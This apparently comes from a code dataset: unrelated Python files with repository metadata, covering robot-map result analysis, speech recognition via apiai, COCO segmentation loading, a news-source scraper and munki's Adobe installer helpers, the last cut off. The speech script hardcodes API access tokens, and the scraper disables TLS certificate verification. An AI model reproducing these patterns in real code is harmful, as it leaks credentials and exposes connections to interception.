'midnightblue', 'lime', 'lightcoral', 'darkgoldenrod', 'violet', 'dimgray', 'darkorange',
'black'
]
def normalize(data, min_val=0.0, max_val=1.0):
data_valid = [v for v in data if v is not None]
dmax = np.max(data_valid)
dmin = np.min(data_valid)
ddata = dmax - dmin
ddes = max_val - min_val
return [(v - dmin) / ddata * ddes + min_val if v is not None else v for v in data]
def logAndNormalize(data, min_val=0.0, max_val=1.0):
data_log = [np.log(v) if v > 0 else None for v in data]
return normalize(data_log)
def readResults(res_dir, nm):
file_nms = sorted([v for v in os.listdir(res_dir) if v.endswith('.txt') and nm in v])
print("- Found files for map {}:\n - {}".format(nm, '\n - '.join(file_nms)))
print("- read general info")
gen_nm = "general_info_{}.txt".format(nm)
general_info = {}
if gen_nm in file_nms:
data = np.loadtxt(os.path.join(res_dir, gen_nm))
assert data.shape == (4,)
general_info['n_vox'] = data[0]
general_info['t_construct'] = data[1]
general_info['ker_mem_kb'] = data[2]
general_info['pc_mem_kb'] = data[3]
print("- read fim")
fim_vox_c_nm = 'fim_vox_c_{}.txt'.format(nm)
fim = {}
if fim_vox_c_nm in file_nms:
fim_vox_c_fn = os.path.join(res_dir, fim_vox_c_nm)
fim_map_fn = os.path.join(res_dir, "fim_map_{}.txt".format(nm))
fim_pc_fn = os.path.join(res_dir, "fim_pc_{}.txt".format(nm))
fim_vox_centers = np.loadtxt(fim_vox_c_fn)
assert fim_vox_centers.shape[1] == 3
n_fim = fim_vox_centers.shape[0]
print(Style.DIM + "Found {} FIM".format(n_fim))
fim_map = np.loadtxt(fim_map_fn)
assert fim_map.shape[1] == 36
assert n_fim == fim_map.shape[0]
fim_pc = np.loadtxt(fim_pc_fn)
assert fim_pc.shape[1] == 36
assert n_fim == fim_pc.shape[0]
fim['vox_c'] = fim_vox_centers
fim['map'] = [v.reshape((6, 6)) for v in fim_map]
fim['pc'] = [v.reshape((6, 6)) for v in fim_pc]
fim_time_map_fn = os.path.join(res_dir, "fim_time_map_{}.txt".format(nm))
fim_time_map = np.loadtxt(fim_time_map_fn)
fim_time_pc_fn = os.path.join(res_dir, "fim_time_pc_{}.txt".format(nm))
fim_time_pc = np.loadtxt(fim_time_pc_fn)
fim['map_time'] = fim_time_map
fim['map_time_mean'] = np.mean(fim_time_map)
fim['pc_time'] = fim_time_pc
fim['pc_time_mean'] = np.mean(fim_time_pc)
print(Style.DIM + "Aver. Map: {}. Aver. PC: {}".format(
fim['map_time_mean'], fim['pc_time_mean']))
else:
print(Fore.RED + "Nothing found.")
print("- read query time")
t_query = {}
for m in kMetrics:
t_map_fn = os.path.join(res_dir, 't_query_map_{}_{}.txt'.format(m, nm))
if not os.path.exists(t_map_fn):
print(Fore.RED + "* metric {} does not exist for query time".format(m))
continue
t_pc_fn = os.path.join(res_dir, 't_query_pc_{}_{}.txt'.format(m, nm))
assert os.path.exists(t_pc_fn)
t_map = np.loadtxt(t_map_fn)
t_map_mean = np.mean(t_map)
t_pc = np.loadtxt(t_pc_fn)
t_pc_mean = np.mean(t_pc)
assert t_map.size == t_pc.size
print(Style.DIM + "* metric {}: {} samples, map aver. {}, pc aver. {}".format(
m, t_map.size, t_map_mean, t_pc_mean))
t_query[m] = {}
t_query[m]['map'] = t_map.ravel().tolist()
t_query[m]['map_mean'] = t_map_mean
t_query[m]['pc'] = t_pc.ravel().tolist()
t_query[m]['pc_mean'] = t_pc_mean
print("- read optimal orientations")
optim_orient = {}
oo_vox_c_fn = os.path.join(res_dir, 'optim_orient_vox_c_{}.txt'.format(nm))
assert os.path.exists(oo_vox_c_fn), oo_vox_c_fn
oo_vox_c = np.loadtxt(oo_vox_c_fn)
assert oo_vox_c.shape[1] == 3
n_oo = oo_vox_c.shape[0]
optim_orient['vox_c'] = oo_vox_c
print(Style.DIM + "Total {} samples".format(n_oo))
for m in kMetrics:
oo_map_fn = os.path.join(res_dir, 'optim_orient_map_{}_{}.txt'.format(m, nm))
if not os.path.exists(oo_map_fn):
print(Fore.RED + "* metric {} does not exist for optimal orientations".format(m))
continue
else:
print(Style.DIM + "* metric {}".format(m))
oo_pc_fn = os.path.join(res_dir, 'optim_orient_pc_{}_{}.txt'.format(m, nm))
assert os.path.exists(oo_pc_fn)
optim_orient[m] = {}
oo_map = np.loadtxt(oo_map_fn)
assert oo_map.shape == (n_oo, 3)
oo_pc = np.loadtxt(oo_pc_fn)
assert oo_pc.shape == (n_oo, 3)
optim_orient[m]['map'] = oo_map
optim_orient[m]['pc'] = oo_pc
print("- read metrics for continous motion")
cont_metrics = {}
cont_rot_fn = os.path.join(res_dir, 'metric_cont_rot_{}.txt'.format(nm))
if os.path.exists(cont_rot_fn):
cont_trans_fn = os.path.join(res_dir, 'metric_cont_trans_{}.txt'.format(nm))
assert os.path.exists(cont_trans_fn)
cont_metrics['rot'] = {}
cont_rot = np.loadtxt(cont_rot_fn)
assert cont_rot.shape[0] == 2
print(Style.DIM + "{} rotations.".format(cont_rot.shape[1]))
cont_metrics['rot']['map'] = cont_rot[0].ravel().tolist()
cont_metrics['rot']['pc'] = cont_rot[1].ravel().tolist()
cont_metrics['trans'] = {}
cont_trans = np.loadtxt(cont_trans_fn)
assert cont_trans.shape[0] == 2
print(Style.DIM + "{} translations.".format(cont_trans.shape[1]))
cont_metrics['trans']['map'] = cont_trans[0].ravel().tolist()
cont_metrics['trans']['pc'] = cont_trans[1].ravel().tolist()
else:
print(Fore.RED + "Nothing found.")
return {"general_info": general_info, 'fim': fim, 't_query': t_query,
'optim_orient': optim_orient, 'cont_metrics': cont_metrics}
def _writeComplexityTable(nm_to_res, pc_res_key, selected_nms, nm_to_label, complexity_table_fn):
sel_labels = [nm_to_label[v] for v in selected_nms]
with open(complexity_table_fn, 'w') as f:
f.write('# PC {}\n'.format(' '.join(sel_labels)))
# construction time
f.write('t_construct (sec) ')
f.write('- ')
for nm in selected_nms:
f.write('{} '.format(nm_to_res[nm]['general_info']['t_construct']))
f.write('\n')
# memory
f.write('memory (MB) ')
f.write('{:.2f} '.format(nm_to_res[pc_res_key]['general_info']['pc_mem_kb'] / 1024.0))
for nm in selected_nms:
f.write('{:.2f} '.format(nm_to_res[nm]['general_info']['ker_mem_kb'] / 1024.0))
f.write('\n')
# query
# fim
f.write('# query (us)\n')
f.write('fim ')
f.write('{:.1f} '.format(nm_to_res[pc_res_key]['fim']['pc_time_mean'] * kSecToUs))
for nm in selected_nms:
fim_res = nm_to_res[nm]['fim']
if 'map_time' not in fim_res:
f.write('- ')
else:
f.write('{:.1f} '.format(fim_res['map_time_mean'] * kSecToUs))
f.write('\n')
# metrics
for m in kMetrics:
f.write('{} '.format(m))
f.write('{:.1f} '.format(nm_to_res[pc_res_key]['t_query'][m]['pc_mean'] * kSecToUs))
for nm in selected_nms:
t_query = nm_to_res[nm]['t_query']
if m not in t_query:
f.write('- ')
else:
f.write('{:.1f} '.format(t_query[m]['map_mean'] * kSecToUs))
f.write('\n')
def _computeAndWriteFIMDiff(nm_to_res, selected_nms, nm_to_label, top_save_dir=None):
fim_fro_diff = {}
sel_labels = [nm_to_label[v] for v in selected_nms]
for nm in selected_nms:
print('- calculating {}'.format(nm))
fim_pc = nm_to_res[nm]['fim']['pc']
fim_map = nm_to_res[nm]['fim']['map']
fim_diff_perc = []
for fim_pc_i, fim_map_i in zip(fim_pc, fim_map):
fro_pc_i = np.linalg.norm(fim_pc_i)
fro_dfim_i = np.linalg.norm(fim_map_i - fim_pc_i)
fim_diff_perc.append(fro_dfim_i / fro_pc_i * 100)
if top_save_dir:
with open(os.path.join(top_save_dir, 'fim_fro_diff_perc_{}.txt'.format(nm)), 'w') as f:
f.write('# each item is one percentage of FIM difference w.r.t. point cloud\n')
f.write('{}'.format(' '.join(['{:.2f}'.format(v) for v in fim_diff_perc])))
fim_fro_diff[nm] = fim_diff_perc
print(Style.DIM + "* {}: {} ({})".format(nm, np.median(fim_diff_perc), np.std(fim_diff_perc)))
if top_save_dir:
print('- writing table')
with open(os.path.join(top_save_dir, 'fim_fro_diff_table.txt'), 'w') as f:
f.write('# Median (std): {}\n'.format(' '.join(sel_labels)))
for nm in selected_nms:
diff_perc = fim_fro_diff[nm]
f.write("{} ({}) ".format(np.median(diff_perc), np.std(diff_perc)))
return fim_fro_diff
def _boxplotFIMDiffs(nm_to_fim_diff_perc, names, nm_to_label, top_save_dir):
xlabels = [nm_to_label[v] for v in names]
data_labels = ['FIM Diff']
colors = [kPallete[0]]
data = []
for nm in names:
data.append(nm_to_fim_diff_perc[nm])
fig = plt.figure(figsize=(12, 6))
ax = fig.add_subplot(111)
pu.boxplot_compare(ax, xlabels, [data], data_labels, colors, legend=False)
ax.set_ylabel("FIM diff. (\%)")
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
plt.tight_layout()
fig.savefig(os.path.join(top_save_dir, 'fim_diffs_boxplot.png'), bbox_inches='tight')
def _computeAndWriteOptimalOrientDiff(nm_to_res, selected_nms, nm_to_label, top_save_dir=None):
orient_diffs = {}
for nm in selected_nms:
print('- calculating {} ...'.format(nm))
orient_diff_per_metric = {}
oo_results = nm_to_res[nm]['optim_orient']
for m in kMetrics:
diffs_i = []
for o_map, o_pc in zip(oo_results[m]['map'], oo_results[m]['pc']):
cos_val = max(-1.0,
min(1.0,
np.dot(o_map, o_pc) / (np.linalg.norm(o_map) * np.linalg.norm(o_pc))))
diffs_i.append(np.rad2deg(np.arccos(cos_val)))
print(Style.DIM + "{}: {} ({})".format(m, np.median(diffs_i), np.std(diffs_i)))
orient_diff_per_metric[m] = diffs_i
orient_diffs[nm] = orient_diff_per_metric
if top_save_dir:
with open(os.path.join(top_save_dir, 'orient_diffs_{}.txt'.format(nm)), 'w') as f:
for m in kMetrics:
f.write('{} {}\n'.format(m, ' '.join([str(v)
for v in orient_diff_per_metric[m]])))
return orient_diffs
def _boxplotOrientDiffs(orient_diffs, names, nm_to_label, top_save_dir):
xlabels = kMetricsLabels
data_labels = [nm_to_label[v] for v in names]
colors = [kPallete[i] for i, v in enumerate(names)]
data = []
for nm in names:
data_i = []
for m in kMetrics:
data_i.append(orient_diffs[nm][m])
data.append(data_i)
fig = plt.figure(figsize=(12, 6))
ax = fig.add_subplot(111)
pu.boxplot_compare(ax, xlabels, data, data_labels, colors)
ax.set_ylabel("Orientation diff. (deg)")
plt.tight_layout()
fig.savefig(os.path.join(top_save_dir, 'orient_diffs_boxplot.png'), bbox_inches='tight')
def _compareContinuousMotion(nm_to_res, selected_nms, nm_to_label, top_save_dir):
pc_cont_motion_res = nm_to_res[selected_nms[0]]
pc_rot_metrics = logAndNormalize(pc_cont_motion_res['cont_metrics']['rot']['pc'])
pc_trans_metrics = logAndNormalize(pc_cont_motion_res['cont_metrics']['trans']['pc'])
fig_rot = plt.figure(figsize=(8, 6))
ax_rot = fig_rot.add_subplot(111)
ax_rot.plot(pc_rot_metrics, label='Point Cloud')
for nm_i in selected_nms:
ax_rot.plot(logAndNormalize(nm_to_res[nm_i]['cont_metrics']
['rot']['map']), label=nm_to_label[nm_i])
ax_rot.set_xticks([])
ax_rot.set_xlabel('Continuous Rotation')
ax_rot.set_ylabel('Normalized Det.')
plt.legend()
plt.tight_layout()
fig_rot.savefig(os.path.join(top_save_dir, 'continuous_rotation.png'), bbox_inches='tight')
fig_trans = plt.figure(figsize=(8, 6))
ax_trans = fig_trans.add_subplot(111)
ax_trans.plot(pc_trans_metrics, label='Point Cloud')
for nm_i in selected_nms:
ax_trans.plot(logAndNormalize(nm_to_res[nm_i]
['cont_metrics']['trans']['map']), label=nm_to_label[nm_i])
ax_trans.set_xticks([])
ax_trans.set_xlabel('Continuous Translation')
# ax_trans.set_ylabel('Normalized Det.')
# plt.legend()
plt.tight_layout()
fig_trans.savefig(os.path.join(top_save_dir, 'continuous_translation.png'), bbox_inches='tight')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--res_dir', required=True)
parser.add_argument('--analyze_config', required=True)
parser.add_argument('--save_dir', type=str, default='analysis_results')
parser.add_argument('--pc_res_key', type=str, default='quad_info_0p5')
parser.set_defaults(map_names=['quad_info', 'quad_trace', 'gp_info', 'gp_trace'])
args = parser.parse_args()
print(Fore.YELLOW + args.__dict__.__str__())
with open(args.analyze_config, 'r') as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
print("Read configurations:\n{}".format(cfg))
map_names = []
map_nm_to_label = {}
for d in cfg['all_maps']:
map_nm_to_label.update(d)
for k in d:
map_names.append(k)
print(Fore.GREEN + "Maps to compare:\n- {}".format('\n- '.join(map_names)))
print(Fore.GREEN + "Labels:\n{}".format(map_nm_to_label))
fim_map_nms = [v for v in map_names if 'info' in v]
compare_orient_map_nms = [v for v in map_names if 'info' in v]
compare_cont_motion_map_nms = [v for v in map_names if 'info' in v]
print("Will analyze FIM for {}".format(fim_map_nms))
print("Will compare orientations for {}".format(compare_orient_map_nms))
print("Will compare cont. motion for {}".format(compare_cont_motion_map_nms))
save_dir = os.path.join(args.res_dir, args.save_dir)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
else:
print(Fore.RED + "Save folder exists, will re-use and overwrite.")
print("Going to save to {}".format(save_dir))
map_nm_to_res = {}
for map_nm in map_names:
print(Fore.GREEN + "====> Reading {}...".format(map_nm))
map_nm_to_res[map_nm] = readResults(args.res_dir, map_nm)
print(Fore.YELLOW + Style.BRIGHT + "Start analysis.")
print(Fore.GREEN + "1. Table of complexity.")
_writeComplexityTable(map_nm_to_res, args.pc_res_key, map_names, map_nm_to_label,
os.path.join(save_dir, 'complexity_table.txt'))
print(Fore.GREEN + "2. FIM difference.")
map_nm_to_fim_diff_perc = _computeAndWriteFIMDiff(
map_nm_to_res, fim_map_nms, map_nm_to_label, save_dir)
_boxplotFIMDiffs(map_nm_to_fim_diff_perc, fim_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + "3. Optimal views.")
map_nm_to_orient_diff = _computeAndWriteOptimalOrientDiff(
map_nm_to_res, compare_orient_map_nms, map_nm_to_label, save_dir)
_boxplotOrientDiffs(map_nm_to_orient_diff, compare_orient_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + "4. Continous motion.")
_compareContinuousMotion(map_nm_to_res, compare_cont_motion_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + Style.BRIGHT + "Start processing specified subsets...")
sel_dir = os.path.join(save_dir, 'selected_results')
if not os.path.exists(sel_dir):
os.makedirs(sel_dir)
if 'sel_complexity_table_entries' in cfg:
print(Fore.GREEN + "- complexity table")
_writeComplexityTable(map_nm_to_res, args.pc_res_key, cfg['sel_complexity_table_entries'], map_nm_to_label, os.path.join(
sel_dir, 'complexity_table.txt'))
if 'sel_fro_norm_table_entries' in cfg:
print(Fore.GREEN + "- FIM diff. table")
sel_fim_nms = cfg['sel_fro_norm_table_entries']
sel_nm_to_fim_diff = _computeAndWriteFIMDiff(
map_nm_to_res, sel_fim_nms, map_nm_to_label, sel_dir)
_boxplotFIMDiffs(sel_nm_to_fim_diff, sel_fim_nms, map_nm_to_label, sel_dir)
if 'sel_hist_orient_entries' in cfg:
sel_orient_nms = cfg['sel_hist_orient_entries']
print(Fore.GREEN + "- Orientation diff.")
sel_nm_to_orient_diff = _computeAndWriteOptimalOrientDiff(
map_nm_to_res, sel_orient_nms, map_nm_to_label, sel_dir)
_boxplotOrientDiffs(sel_nm_to_orient_diff, sel_orient_nms, map_nm_to_label, sel_dir)
if 'sel_cont_motion_plot' in cfg:
print(Fore.GREEN + "- continuous motion")
_compareContinuousMotion(
map_nm_to_res, cfg['sel_cont_motion_plot'], map_nm_to_label, sel_dir)
| 41.505882
| 129
| 0.626361
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,335
| 0.189059
|
35fbe8e8b4f1e1aa102f85306945ce878960b4de
| 52
|
py
|
Python
|
tests/conftest.py
|
grintor/Hello-Wolrd-CI
|
1f1b8c40f55d0b35cd73601ed90567a84abf03db
|
[
"Apache-2.0"
] | null | null | null |
tests/conftest.py
|
grintor/Hello-Wolrd-CI
|
1f1b8c40f55d0b35cd73601ed90567a84abf03db
|
[
"Apache-2.0"
] | null | null | null |
tests/conftest.py
|
grintor/Hello-Wolrd-CI
|
1f1b8c40f55d0b35cd73601ed90567a84abf03db
|
[
"Apache-2.0"
] | null | null | null |
# see: https://stackoverflow.com/a/34520971/3238695
| 26
| 51
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 51
| 0.980769
|
35fc69cf4551ec557452a3db41e67d9efead2ebf
| 1,318
|
py
|
Python
|
Files/SpeechRecognition/speechDandR.py
|
JahnaviDoneria/HomeAutomationSystem
|
0419ba4a0fefd16b9a5c7a19fef7897d76850dc2
|
[
"MIT"
] | null | null | null |
Files/SpeechRecognition/speechDandR.py
|
JahnaviDoneria/HomeAutomationSystem
|
0419ba4a0fefd16b9a5c7a19fef7897d76850dc2
|
[
"MIT"
] | null | null | null |
Files/SpeechRecognition/speechDandR.py
|
JahnaviDoneria/HomeAutomationSystem
|
0419ba4a0fefd16b9a5c7a19fef7897d76850dc2
|
[
"MIT"
] | 1
|
2020-01-20T13:04:55.000Z
|
2020-01-20T13:04:55.000Z
|
import json
import apiai
import speech_recognition as sr
def speechRecognition():
recog = sr.Recognizer()
with sr.Microphone() as source:
print("It's your cue")
audio = recog.listen(source)
i = True
while i is True:
try:
text = recog.recognize_google(audio)
i = False
speechPrediction(text)
except sr.UnknownValueError:
print("Please speak again")
except sr.RequestError:
print("Please check your connection")
def speechPrediction(text):
CLIENT_ACCESS_TOKEN = "6bcf8d38ee7344989af9aee9b0ffee11"
DEVELOPER_ACCESS_TOKEN = "cae24c147f4d4af0b58ebbed1d97ad1b"
ai = apiai.ApiAI(CLIENT_ACCESS_TOKEN)
requests = ai.text_request()
requests.query = text
requests.lang = "en"
response = requests.getresponse()
print(response)
intent,room = JSONresponse(response)
return intent,room
def JSONresponse(response):
json_response = json.loads(response.read().decode('utf-8'))
intent= []
room= []
print(json_response)
print('...')
result = json_response['result']
intent = result['action']
print(intent)
room_result = result['parameters']
room = room_result['room']
print(room)
return intent,room
#speechRecognition()
| 23.122807
| 63
| 0.651745
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 203
| 0.154021
|
35fcbb05f8e3b57b8ab5311822807b3114647a9f
| 4,667
|
py
|
Python
|
mylib/dataset/coco.py
|
duducheng/deeplabv3p_gluon
|
fd8e3e8d834838a9a221785b825499c62cee578f
|
[
"Apache-2.0"
] | 66
|
2018-07-20T04:01:41.000Z
|
2021-11-08T10:40:49.000Z
|
mylib/dataset/coco.py
|
duducheng/deeplabv3p_gluon
|
fd8e3e8d834838a9a221785b825499c62cee578f
|
[
"Apache-2.0"
] | 6
|
2018-08-16T08:06:39.000Z
|
2020-11-28T13:07:21.000Z
|
mylib/dataset/coco.py
|
duducheng/deeplabv3p_gluon
|
fd8e3e8d834838a9a221785b825499c62cee578f
|
[
"Apache-2.0"
] | 11
|
2018-07-20T18:00:29.000Z
|
2020-04-28T15:21:58.000Z
|
# raise NotImplementedError("Did not check!")
"""MSCOCO Semantic Segmentation pretraining for VOC."""
import os
from tqdm import trange
from PIL import Image, ImageOps, ImageFilter
import numpy as np
import pickle
from gluoncv.data.segbase import SegmentationDataset
class COCOSegmentation(SegmentationDataset):
CAT_LIST = [0, 5, 2, 16, 9, 44, 6, 3, 17, 62, 21, 67, 18, 19, 4,
1, 64, 20, 63, 7, 72]
NUM_CLASS = 21
def __init__(self, root=os.path.expanduser('~/.mxnet/datasets/coco'),
split='train', mode=None, transform=None):
super(COCOSegmentation, self).__init__(root, split, mode, transform)
from pycocotools.coco import COCO
from pycocotools import mask
if split == 'train':
print('train set')
ann_file = os.path.join(root, 'annotations/instances_train2017.json')
ids_file = os.path.join(root, 'annotations/train_ids.mx')
self.root = os.path.join(root, 'train2017')
else:
print('val set')
ann_file = os.path.join(root, 'annotations/instances_val2017.json')
ids_file = os.path.join(root, 'annotations/val_ids.mx')
self.root = os.path.join(root, 'val2017')
self.coco = COCO(ann_file)
self.coco_mask = mask
if os.path.exists(ids_file):
with open(ids_file, 'rb') as f:
self.ids = pickle.load(f)
else:
ids = list(self.coco.imgs.keys())
self.ids = self._preprocess(ids, ids_file)
self.transform = transform
# self.root = os.path.join(root, 'train2017') if split == 'train' else \
# os.path.join(root, 'val2017')
def __getitem__(self, index):
coco = self.coco
img_id = self.ids[index]
img_metadata = coco.loadImgs(img_id)[0]
path = img_metadata['file_name']
img = Image.open(os.path.join(self.root, path)).convert('RGB')
cocotarget = coco.loadAnns(coco.getAnnIds(imgIds=img_id))
mask = Image.fromarray(self._gen_seg_mask(cocotarget, img_metadata['height'],
img_metadata['width']))
# synchrosized transform
if self.mode == 'train':
img, mask = self._sync_transform(img, mask)
elif self.mode == 'val':
img, mask = self._val_sync_transform(img, mask)
else:
assert self.mode == 'testval'
mask = self._mask_transform(mask)
# general resize, normalize and toTensor
if self.transform is not None:
img = self.transform(img)
return img, mask
def __len__(self):
return len(self.ids)
def _gen_seg_mask(self, target, h, w):
mask = np.zeros((h, w), dtype=np.uint8)
coco_mask = self.coco_mask
for instance in target:
rle = coco_mask.frPyObjects(instance['segmentation'], h, w)
m = coco_mask.decode(rle)
cat = instance['category_id']
if cat in self.CAT_LIST:
c = self.CAT_LIST.index(cat)
else:
continue
if len(m.shape) < 3:
mask[:, :] += (mask == 0) * (m * c)
else:
mask[:, :] += (mask == 0) * (((np.sum(m, axis=2)) > 0) * c).astype(np.uint8)
return mask
def _preprocess(self, ids, ids_file):
print("Preprocessing mask, this will take a while." + \
"But don't worry, it only run once for each split.")
tbar = trange(len(ids))
new_ids = []
for i in tbar:
img_id = ids[i]
cocotarget = self.coco.loadAnns(self.coco.getAnnIds(imgIds=img_id))
img_metadata = self.coco.loadImgs(img_id)[0]
mask = self._gen_seg_mask(cocotarget, img_metadata['height'],
img_metadata['width'])
# more than 1k pixels
if (mask > 0).sum() > 1000:
new_ids.append(img_id)
tbar.set_description('Doing: {}/{}, got {} qualified images'. \
format(i, len(ids), len(new_ids)))
print('Found number of qualified images: ', len(new_ids))
with open(ids_file, 'wb') as f:
pickle.dump(new_ids, f)
return new_ids
@property
def classes(self):
"""Category names."""
return ('background', 'airplane', 'bicycle', 'bird', 'boat', 'bottle',
'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse',
'motorcycle', 'person', 'potted-plant', 'sheep', 'sofa', 'train',
'tv')
| 40.582609
| 92
| 0.555817
| 4,395
| 0.941718
| 0
| 0
| 329
| 0.070495
| 0
| 0
| 948
| 0.203128
|
35fd4da34b0954ed2f821de46d87379191733efa
| 1,045
|
py
|
Python
|
find_other_news_sources.py
|
sr33/OtherNewsSources
|
17857381a5690d5e89d4a034f1fc60f61c2377dc
|
[
"MIT"
] | 10
|
2015-07-17T09:57:38.000Z
|
2020-05-24T20:09:20.000Z
|
find_other_news_sources.py
|
sr33/OtherNewsSources
|
17857381a5690d5e89d4a034f1fc60f61c2377dc
|
[
"MIT"
] | null | null | null |
find_other_news_sources.py
|
sr33/OtherNewsSources
|
17857381a5690d5e89d4a034f1fc60f61c2377dc
|
[
"MIT"
] | null | null | null |
# __author__ = 'sree'
import urllib2
from lxml import html
import requests
def get_page_tree(url=None):
page = requests.get(url=url, verify=False)
return html.fromstring(page.text)
def get_title(url=None):
tree = get_page_tree(url=url)
return tree.xpath('//title//text()')[0].strip().split(' -')[0]
def find_other_news_sources(url=None, title=None):
# Google forwards the url using <google_domain>/url?q=<actual_link>. This might change over time
forwarding_identifier = '/url?q='
if not title:
title = get_title(url=url)
parent_url_exclude = '-site:' + url
google_news_search_url = 'http://www.google.com/search?q=' + urllib2.quote(title) + parent_url_exclude + '&tbm=nws'
google_news_search_tree = get_page_tree(url=google_news_search_url)
other_news_sources_links = [a_link.replace(forwarding_identifier, '').split('&')[0] for a_link in
google_news_search_tree.xpath('//a//@href') if forwarding_identifier in a_link]
return other_news_sources_links
| 40.192308
| 119
| 0.702392
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 215
| 0.205742
|
35fda7f9b73a414c879824f59fa81da72f267f5a
| 35,235
|
py
|
Python
|
code/client/munkilib/adobeutils/adobeinfo.py
|
Rippling/munki
|
115832687d4411ca825202ec82d9a27053fef7c8
|
[
"Apache-2.0"
] | 1
|
2021-10-06T12:56:14.000Z
|
2021-10-06T12:56:14.000Z
|
code/client/munkilib/adobeutils/adobeinfo.py
|
Rippling/munki
|
115832687d4411ca825202ec82d9a27053fef7c8
|
[
"Apache-2.0"
] | null | null | null |
code/client/munkilib/adobeutils/adobeinfo.py
|
Rippling/munki
|
115832687d4411ca825202ec82d9a27053fef7c8
|
[
"Apache-2.0"
] | null | null | null |
# encoding: utf-8
# Copyright 2009-2020 Greg Neagle.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
adobeutils.adobeinfo
Created by Greg Neagle on 2017-01-06.
Utilities to get info about Adobe installers/uninstallers
"""
from __future__ import absolute_import, print_function
import os
import json
import sqlite3
from glob import glob
from xml.dom import minidom
from .. import osutils
from .. import pkgutils
def find_install_app(dirpath):
'''Searches dirpath and enclosed directories for Install.app.
Returns the path to the actual executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("Install.app"):
setup_path = os.path.join(path, "Contents", "MacOS", "Install")
if os.path.exists(setup_path):
return setup_path
return ''
def find_setup_app(dirpath):
'''Search dirpath and enclosed directories for Setup.app.
Returns the path to the actual executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("Setup.app"):
setup_path = os.path.join(path, "Contents", "MacOS", "Setup")
if os.path.exists(setup_path):
return setup_path
return ''
def find_adobepatchinstaller_app(dirpath):
'''Searches dirpath and enclosed directories for AdobePatchInstaller.app.
Returns the path to the actual executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("AdobePatchInstaller.app"):
setup_path = os.path.join(
path, "Contents", "MacOS", "AdobePatchInstaller")
if os.path.exists(setup_path):
return setup_path
return ''
def find_adobe_deployment_manager(dirpath):
'''Searches dirpath and enclosed directories for AdobeDeploymentManager.
Returns path to the executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("pkg/Contents/Resources"):
dm_path = os.path.join(path, "AdobeDeploymentManager")
if os.path.exists(dm_path):
return dm_path
return ''
def find_acrobat_patch_app(dirpath):
'''Attempts to find an AcrobatPro patching application
in dirpath. If found, returns the path to the bundled
patching script.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith(".app"):
# look for Adobe's patching script
patch_script_path = os.path.join(
path, 'Contents', 'Resources', 'ApplyOperation.py')
if os.path.exists(patch_script_path):
return path
return ''
def get_payload_info(dirpath):
'''Parses Adobe payloads, pulling out info useful to munki.
.proxy.xml files are used if available, or for CC-era updates
which do not contain one, the Media_db.db file, which contains
identical XML, is instead used.
CS3/CS4: contain only .proxy.xml
CS5/CS5.5/CS6: contain both
CC: contain only Media_db.db'''
payloadinfo = {}
# look for .proxy.xml file dir
if os.path.isdir(dirpath):
proxy_paths = glob(os.path.join(dirpath, '*.proxy.xml'))
if proxy_paths:
xmlpath = proxy_paths[0]
dom = minidom.parse(xmlpath)
# if there's no .proxy.xml we should hope there's a Media_db.db
else:
db_path = os.path.join(dirpath, 'Media_db.db')
if os.path.exists(db_path):
conn = sqlite3.connect(db_path)
cur = conn.cursor()
cur.execute("SELECT value FROM PayloadData WHERE "
"PayloadData.key = 'PayloadInfo'")
result = cur.fetchone()
cur.close()
if result:
info_xml = result[0].encode('UTF-8')
dom = minidom.parseString(info_xml)
else:
# no xml, no db, no payload info!
return payloadinfo
payload_info = dom.getElementsByTagName('PayloadInfo')
if payload_info:
installer_properties = payload_info[0].getElementsByTagName(
'InstallerProperties')
if installer_properties:
properties = installer_properties[0].getElementsByTagName(
'Property')
for prop in properties:
if 'name' in list(prop.attributes.keys()):
propname = prop.attributes['name'].value.encode('UTF-8')
propvalue = ''
for node in prop.childNodes:
propvalue += node.nodeValue
if propname == 'AdobeCode':
payloadinfo['AdobeCode'] = propvalue
if propname == 'ProductName':
payloadinfo['display_name'] = propvalue
if propname == 'ProductVersion':
payloadinfo['version'] = propvalue
installmetadata = payload_info[0].getElementsByTagName(
'InstallDestinationMetadata')
if installmetadata:
totalsizes = installmetadata[0].getElementsByTagName(
'TotalSize')
if totalsizes:
installsize = ''
for node in totalsizes[0].childNodes:
installsize += node.nodeValue
payloadinfo['installed_size'] = int(int(installsize)/1024)
return payloadinfo
def get_adobe_setup_info(installroot):
'''Given the root of mounted Adobe DMG,
look for info about the installer or updater'''
info = {}
payloads = []
# look for all the payloads folders
for (path, dummy_dirs, dummy_files) in os.walk(installroot):
if path.endswith('/payloads'):
driverfolder = ''
media_signature = ''
setupxml = os.path.join(path, 'setup.xml')
if os.path.exists(setupxml):
dom = minidom.parse(setupxml)
drivers = dom.getElementsByTagName('Driver')
if drivers:
driver = drivers[0]
if 'folder' in list(driver.attributes.keys()):
driverfolder = driver.attributes[
'folder'].value.encode('UTF-8')
if driverfolder == '':
# look for mediaSignature (CS5 AAMEE install)
setup_elements = dom.getElementsByTagName('Setup')
if setup_elements:
media_signature_elements = setup_elements[
0].getElementsByTagName('mediaSignature')
if media_signature_elements:
element = media_signature_elements[0]
for node in element.childNodes:
